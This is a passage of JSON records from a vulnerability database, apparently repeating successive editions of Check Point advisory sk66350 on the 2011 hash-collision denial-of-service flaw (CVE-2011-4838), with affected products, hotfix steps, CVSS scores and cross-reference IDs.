"impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-15T03:13:43", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4885", "UB:CVE-2011-4838", "UB:CVE-2011-4815"]}, {"type": "cve", "idList": ["CVE-2011-4815", "CVE-2011-4885", "CVE-2011-3414", "CVE-2011-4838"]}, {"type": "f5", "idList": ["F5:K13588", "SOL13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2012-001", "CPAI-2013-033", "CPAI-2014-1022"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27501", "SECURITYVULNS:DOC:27500"]}, {"type": "seebug", "idList": ["SSV:26126", "SSV:26121", "SSV:72454", "SSV:26122", "SSV:30071", "SSV:30001"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310122001", "OPENVAS:1361412562310863681", "OPENVAS:1361412562310870539", "OPENVAS:1361412562310831554", "OPENVAS:136141256231070735", "OPENVAS:1361412562310863963", "OPENVAS:1361412562310120256", "OPENVAS:70754", "OPENVAS:881142", "OPENVAS:1361412562310863954", "OPENVAS:1361412562310863921", "OPENVAS:1361412562310881167", "OPENVAS:881149", "OPENVAS:870539", "OPENVAS:870638", "OPENVAS:136141256231071568", "OPENVAS:1361412562310870638", "OPENVAS:831554", "OPENVAS:71568", "OPENVAS:863921", "OPENVAS:136141256231070754", "OPENVAS:1361412562310120218", "OPENVAS:863954", "OPENVAS:863681", "OPENVAS:1361412562310122002", "OPENVAS:881167"]}, {"type": "nessus", "idList": ["MANDRIVA_MDVSA-2012-024.NASL", "FEDORA_2012-1262.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "REDHAT-RHSA-2012-0070.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "CENTOS_RHSA-2012-0070.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "ORACLELINUX_ELSA-2012-0070.NASL", "GENTOO_GLSA-201207-06.NASL", "FEDORA_2012-0420.NASL", "DEBIAN_DLA-209.NASL", "F5_BIGIP_SOL13588.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "ALA_ALAS-2012-35.NASL", "REDHAT-RHSA-2012-0069.NASL", "CENTOS_RHSA-2012-0069.NASL", "FEDORA_2012-0504.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "FEDORA_2011-17542.NASL", "SOLARIS11_RUBY_20120417.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "FEDORA_2011-17551.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0069", "CESA-2012:0070"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:6097820D6A", "FEDORA:6D8EE20EB6", "FEDORA:BFF2C21133", "FEDORA:3515C213E6"]}, {"type": "amazon", "idList": ["ALAS-2012-041", "ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0070", "ELSA-2012-0069"]}, {"type": "redhat", "idList": ["RHSA-2012:0070", "RHSA-2012:0069"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:6EC99", "DEBIAN:DLA-209-1:3C908"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108294", "PACKETSTORM:108287"]}, {"type": "exploitdb", "idList": ["EDB-ID:18296", "EDB-ID:18305"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "rubygems", "idList": ["RUBY:JRUBY-2011-4838-78116", "RUBY:RUBY-2011-4815-78118"]}], "modified": "2021-11-15T03:13:43", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-15T03:13:43", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-15T03:13:43", "differentElements": ["modified", "published"], "edition": 27}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "fc0b35930d07b486d73f615d467b0b5b", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-30T08:00:00", "modified": "2011-12-30T08:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-15T15:19:25", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4838", "UB:CVE-2011-4885", "UB:CVE-2011-4815"]}, {"type": "cve", "idList": ["CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885", "CVE-2011-3414"]}, {"type": "f5", "idList": ["F5:K13588", "SOL13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2012-001", "CPAI-2014-1022", "CPAI-2013-033"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27501", "SECURITYVULNS:DOC:27500"]}, {"type": "seebug", "idList": ["SSV:26126", "SSV:26122", "SSV:30001", "SSV:72454", "SSV:26121", "SSV:30071"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310120218", "OPENVAS:136141256231070735", "OPENVAS:1361412562310863963", "OPENVAS:1361412562310863681", "OPENVAS:870539", "OPENVAS:70754", "OPENVAS:1361412562310120256", "OPENVAS:1361412562310870539", "OPENVAS:136141256231071568", "OPENVAS:831554", "OPENVAS:1361412562310122002", "OPENVAS:881142", "OPENVAS:863954", "OPENVAS:1361412562310881167", "OPENVAS:870638", "OPENVAS:863921", "OPENVAS:1361412562310870638", "OPENVAS:1361412562310863921", "OPENVAS:881167", "OPENVAS:863681", "OPENVAS:71568", "OPENVAS:1361412562310831554", "OPENVAS:881149", "OPENVAS:136141256231070754", "OPENVAS:1361412562310863954", "OPENVAS:1361412562310122001"]}, {"type": "nessus", "idList": ["FEDORA_2012-0420.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "SOLARIS11_RUBY_20120417.NASL", "FEDORA_2011-17542.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "GENTOO_GLSA-201207-06.NASL", "CENTOS_RHSA-2012-0070.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "REDHAT-RHSA-2012-0070.NASL", "F5_BIGIP_SOL13588.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "FEDORA_2012-1262.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "DEBIAN_DLA-209.NASL", "FEDORA_2012-0504.NASL", "ALA_ALAS-2012-35.NASL", "CENTOS_RHSA-2012-0069.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "REDHAT-RHSA-2012-0069.NASL", "FEDORA_2011-17551.NASL", "ORACLELINUX_ELSA-2012-0070.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0069", "CESA-2012:0070"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:6D8EE20EB6", "FEDORA:3515C213E6", "FEDORA:6097820D6A", "FEDORA:BFF2C21133"]}, {"type": "amazon", "idList": ["ALAS-2012-035", "ALAS-2012-041"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0070", "ELSA-2012-0069"]}, {"type": "redhat", "idList": ["RHSA-2012:0070", "RHSA-2012:0069"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:3C908", "DEBIAN:DLA-209-1:6EC99"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108294", "PACKETSTORM:108287"]}, {"type": "exploitdb", "idList": ["EDB-ID:18296", "EDB-ID:18305"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "rubygems", "idList": ["RUBY:RUBY-2011-4815-78118", "RUBY:JRUBY-2011-4838-78116"]}], "modified": "2021-11-15T15:19:25", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-15T15:19:25", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-15T15:19:25", "differentElements": ["modified", "published"], "edition": 28}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "cfdde2d0d2a7ecab5dccde9688c57e9c", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-29T22:00:00", "modified": "2011-12-29T22:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-16T19:13:27", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4838", "UB:CVE-2011-4815", "UB:CVE-2011-4885"]}, {"type": "cve", "idList": ["CVE-2011-4815", "CVE-2011-3414", "CVE-2011-4885", "CVE-2011-4838"]}, {"type": "f5", "idList": ["F5:K13588", "SOL13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2013-033", "CPAI-2012-001", "CPAI-2014-1022"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500", "SECURITYVULNS:DOC:27501"]}, {"type": "seebug", "idList": ["SSV:72454", "SSV:26126", "SSV:26122", "SSV:26121", "SSV:30001"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231071568", "OPENVAS:136141256231070754", "OPENVAS:1361412562310881226", "OPENVAS:831554", "OPENVAS:70735", "OPENVAS:863681", "OPENVAS:1361412562310863824", "OPENVAS:863921", "OPENVAS:1361412562310863921", "OPENVAS:70754", "OPENVAS:1361412562310863681", "OPENVAS:1361412562310122002", "OPENVAS:71568", "OPENVAS:1361412562310870638", "OPENVAS:870539", "OPENVAS:881167", "OPENVAS:870638", "OPENVAS:1361412562310120218", "OPENVAS:1361412562310881167", "OPENVAS:863824", "OPENVAS:881142", "OPENVAS:1361412562310122001", "OPENVAS:881226", "OPENVAS:1361412562310831554"]}, {"type": "nessus", "idList": ["FEDORA_2011-17551.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "CENTOS_RHSA-2012-0070.NASL", "FEDORA_2012-0420.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "ORACLELINUX_ELSA-2012-0069.NASL", "ALA_ALAS-2012-35.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "ALA_ALAS-2012-37.NASL", "SOLARIS11_RUBY_20120417.NASL", "FREEBSD_PKG_D39218103C8011E197E800215C6A37BB.NASL", "REDHAT-RHSA-2012-0070.NASL", "FEDORA_2011-17542.NASL", "REDHAT-RHSA-2012-0019.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "REDHAT-RHSA-2012-0069.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "GENTOO_GLSA-201207-06.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "DEBIAN_DLA-209.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "CENTOS_RHSA-2012-0069.NASL", "FEDORA_2012-0504.NASL", "F5_BIGIP_SOL13588.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0069", "CESA-2012:0019", "CESA-2012:0070"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:7F79620D03", "FEDORA:6D8EE20EB6", "FEDORA:BFF2C21133", "FEDORA:4930D21410", "FEDORA:76D5120DE0"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0070", "ELSA-2012-0069"]}, {"type": "redhat", "idList": ["RHSA-2012:0070", "RHSA-2012:0069"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:3C908", "DEBIAN:DLA-209-1:6EC99"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108294", "PACKETSTORM:108287"]}, {"type": "exploitdb", "idList": ["EDB-ID:18296", "EDB-ID:18305"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "rubygems", "idList": ["RUBY:RUBY-2011-4815-78118", "RUBY:JRUBY-2011-4838-78116"]}], "modified": "2021-11-16T19:13:27", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-16T19:13:27", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-16T19:13:27", "differentElements": ["modified", "published"], "edition": 29}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "fc0b35930d07b486d73f615d467b0b5b", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-30T08:00:00", "modified": "2011-12-30T08:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-16T23:11:50", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4838", "UB:CVE-2011-4885", "UB:CVE-2011-4815"]}, {"type": "cve", "idList": ["CVE-2011-4838", "CVE-2011-4885", "CVE-2011-4815", "CVE-2011-3414"]}, {"type": "f5", "idList": ["SOL13588", "F5:K13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2012-001", "CPAI-2013-033", "CPAI-2014-1022"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500", "SECURITYVULNS:DOC:27501"]}, {"type": "seebug", "idList": ["SSV:26121", "SSV:26126", "SSV:30001", "SSV:26122", "SSV:72454"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310122002", "OPENVAS:863742", "OPENVAS:863963", "OPENVAS:1361412562310863740", "OPENVAS:70754", "OPENVAS:1361412562310122001", "OPENVAS:863681", "OPENVAS:71568", "OPENVAS:870638", "OPENVAS:136141256231071568", "OPENVAS:881167", "OPENVAS:1361412562310863921", "OPENVAS:1361412562310881142", "OPENVAS:136141256231070754", "OPENVAS:870539", "OPENVAS:870542", "OPENVAS:1361412562310881167", "OPENVAS:831554", "OPENVAS:1361412562310120218", "OPENVAS:863735", "OPENVAS:1361412562310831554", "OPENVAS:881142", "OPENVAS:1361412562310870638", "OPENVAS:1361412562310863681", "OPENVAS:863921"]}, {"type": "nessus", "idList": ["FEDORA_2012-1301.NASL", "CENTOS_RHSA-2012-0070.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "FEDORA_2011-17551.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "FEDORA_2011-17542.NASL", "FEDORA_2012-0420.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "SL_20120130_RUBY_ON_SL4_X.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "ALA_ALAS-2012-35.NASL", "SOLARIS11_RUBY_20120417.NASL", "DEBIAN_DLA-209.NASL", "F5_BIGIP_SOL13588.NASL", "FEDORA_2012-0504.NASL", "GENTOO_GLSA-201207-06.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "FEDORA_2012-1262.NASL", "REDHAT-RHSA-2012-0069.NASL", "CENTOS_RHSA-2012-0069.NASL", "REDHAT-RHSA-2012-0070.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0070", "CESA-2012:0092", "CESA-2012:0069"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:BFF2C21133", "FEDORA:6D8EE20EB6", "FEDORA:6D55C20D95"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0070", "ELSA-2012-0069"]}, {"type": 